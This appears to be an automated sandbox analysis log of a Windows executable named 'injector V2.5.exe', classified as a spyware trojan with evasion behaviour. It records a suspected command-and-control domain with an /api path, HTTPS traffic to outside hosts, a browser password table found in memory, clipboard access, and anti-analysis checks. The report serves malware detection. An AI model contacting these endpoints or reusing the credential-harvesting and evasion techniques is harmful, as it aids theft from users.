          Source: injector V2.5.exe, 00000002.00000003.1863121105.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1834651944.00000000053DB000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1839575031.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939838274.00000000053DE000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1834937904.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1862335417.00000000053DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/VQ
          Source: injector V2.5.exe, injector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1914569157.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1914478283.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1935433049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1865163873.0000000002DE6000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787694380.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1866698690.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1865220459.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1935358700.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940739187.0000000002DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
          Source: injector V2.5.exe, 00000002.00000003.1914569157.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apit1
          Source: injector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/s
          Source: injector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/apiBB2B7164E
          Source: injector V2.5.exe, 00000002.00000003.1788363210.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: injector V2.5.exe, 00000002.00000003.1788447753.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788363210.000000000542F000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1810691488.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788551864.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: injector V2.5.exe, 00000002.00000003.1788447753.0000000005403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: injector V2.5.exe, 00000002.00000003.1788447753.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788363210.000000000542F000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1810691488.0000000005428000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788551864.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: injector V2.5.exe, 00000002.00000003.1788447753.0000000005403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: injector V2.5.exe, 00000002.00000003.1841001230.00000000054F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00435300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00435300
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00435300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00435300
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FF4D00_2_005FF4D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_006034D00_2_006034D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_006015A00_2_006015A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FF9800_2_005FF980
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FCE700_2_005FCE70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005F86C00_2_005F86C0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FD7F00_2_005FD7F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00611FD20_2_00611FD2
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004290602_2_00429060
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004248602_2_00424860
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004190D02_2_004190D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004221102_2_00422110
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043D2602_2_0043D260
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00409AE02_2_00409AE0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043AAE02_2_0043AAE0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042F3ED2_2_0042F3ED
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042E3982_2_0042E398
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00442C402_2_00442C40
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041A4DA2_2_0041A4DA
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040AD502_2_0040AD50
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004435802_2_00443580
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004266182_2_00426618
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043A7602_2_0043A760
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004418602_2_00441860
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004078702_2_00407870
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004238152_2_00423815
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042A0D52_2_0042A0D5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041E0E82_2_0041E0E8
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004350F02_2_004350F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042B0FA2_2_0042B0FA
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043B0A02_2_0043B0A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043A0A02_2_0043A0A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004068B02_2_004068B0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042C14A2_2_0042C14A
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004419302_2_00441930
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004329C62_2_004329C6
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041FF7F2_2_0041FF7F
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00425A4A2_2_00425A4A
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004212502_2_00421250
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004432602_2_00443260
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004062002_2_00406200
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00404A312_2_00404A31
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043DAC02_2_0043DAC0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043E2D02_2_0043E2D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041E2F02_2_0041E2F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004332F02_2_004332F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040B2802_2_0040B280
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004223602_2_00422360
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00402B702_2_00402B70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041EFF52_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041BB102_2_0041BB10
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041FB202_2_0041FB20
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00426BD02_2_00426BD0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00431BE82_2_00431BE8
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00405BF02_2_00405BF0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041EBF02_2_0041EBF0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004413A02_2_004413A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004254102_2_00425410
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00430C1C2_2_00430C1C
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00420C902_2_00420C90
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00406D602_2_00406D60
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042FD652_2_0042FD65
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004035702_2_00403570
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004295202_2_00429520
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004205F02_2_004205F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004055F82_2_004055F8
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042B5882_2_0042B588
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004415972_2_00441597
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041B5A12_2_0041B5A1
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00439E402_2_00439E40
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00408E502_2_00408E50
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040CE522_2_0040CE52
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00426E002_2_00426E00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004326152_2_00432615
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041F6E02_2_0041F6E0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004296F42_2_004296F4
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004096A02_2_004096A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00442F402_2_00442F40
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00426F702_2_00426F70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041FF7F2_2_0041FF7F
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00404F052_2_00404F05
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043D7102_2_0043D710
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041C7C92_2_0041C7C9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_004287D02_2_004287D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0040E7D92_2_0040E7D9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041EFF52_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042EF872_2_0042EF87
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041BFB62_2_0041BFB6
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0042E7BB2_2_0042E7BB
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FF9802_2_005FF980
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FF4D02_2_005FF4D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_006034D02_2_006034D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_006015A02_2_006015A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FCE702_2_005FCE70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005F86C02_2_005F86C0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FD7F02_2_005FD7F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00611FD22_2_00611FD2
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 00608178 appears 36 times
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 004190C0 appears 35 times
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 004083F0 appears 37 times
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: String function: 006055C0 appears 65 times
          Source: injector V2.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: injector V2.5.exeStatic PE information: Section: .coS ZLIB complexity 1.000328100237718
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@2/2
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043AAE0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043AAE0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
          Source: injector V2.5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\injector V2.5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: injector V2.5.exe, 00000002.00000003.1788517112.00000000053D5000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1788142973.0000000005407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: injector V2.5.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\injector V2.5.exeFile read: C:\Users\user\Desktop\injector V2.5.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: injector V2.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: injector V2.5.exeStatic PE information: section name: .00cfg
          Source: injector V2.5.exeStatic PE information: section name: .coS
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00604BC5 push ecx; ret 0_2_00604BD8
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_3_02DF9548 push ds; ret 2_3_02DF954A
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_3_02DE6BE0 push esp; retf 2_3_02DE6BEC
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_3_02DE6BE0 push esp; retf 2_3_02DE6BEC
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_3_02DE6BE0 push esp; retf 2_3_02DE6BEC
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_3_02DE6BE0 push esp; retf 2_3_02DE6BEC
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00604BC5 push ecx; ret 2_2_00604BD8
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00604CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00604CA2
          Source: C:\Users\user\Desktop\injector V2.5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\injector V2.5.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeAPI coverage: 9.1 %
          Source: C:\Users\user\Desktop\injector V2.5.exe TID: 6228Thread sleep time: -210000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exe TID: 6228Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_0060C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0060C7DB
          Source: injector V2.5.exe, 00000002.00000003.1935433049.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1935433049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0043FAC0 LdrInitializeThunk,2_2_0043FAC0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00605444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00605444
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FCD10 mov eax, dword ptr fs:[00000030h]0_2_005FCD10
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_0061B18D mov edi, dword ptr fs:[00000030h]0_2_0061B18D
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_005FBD50 mov edi, dword ptr fs:[00000030h]0_2_005FBD50
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FBD50 mov edi, dword ptr fs:[00000030h]2_2_005FBD50
